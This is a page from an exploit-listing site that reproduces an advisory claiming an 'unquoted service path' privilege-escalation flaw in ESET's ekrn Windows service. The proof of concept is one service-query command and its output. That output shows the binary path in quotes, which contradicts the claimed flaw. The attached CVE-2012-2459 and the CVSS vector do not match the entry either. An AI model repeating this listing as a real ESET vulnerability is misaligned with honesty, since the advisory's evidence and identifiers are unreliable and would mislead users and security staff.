ESET Service Unquoted Service Path

CVE Category Price Severity
CVE-2012-2459 CWE-428 $0 - $5k High
Author Risk Exploitation Type Date
N/A High Local 2023-04-10
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

ESET Service Unquoted Service Path
# Exploit Title: ESET Service - 'Service ekrn' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-04-05
# Vendor :
# Version :
# Tested on OS: Microsoft Windows 11 pro x64

#PoC :

C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS

        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum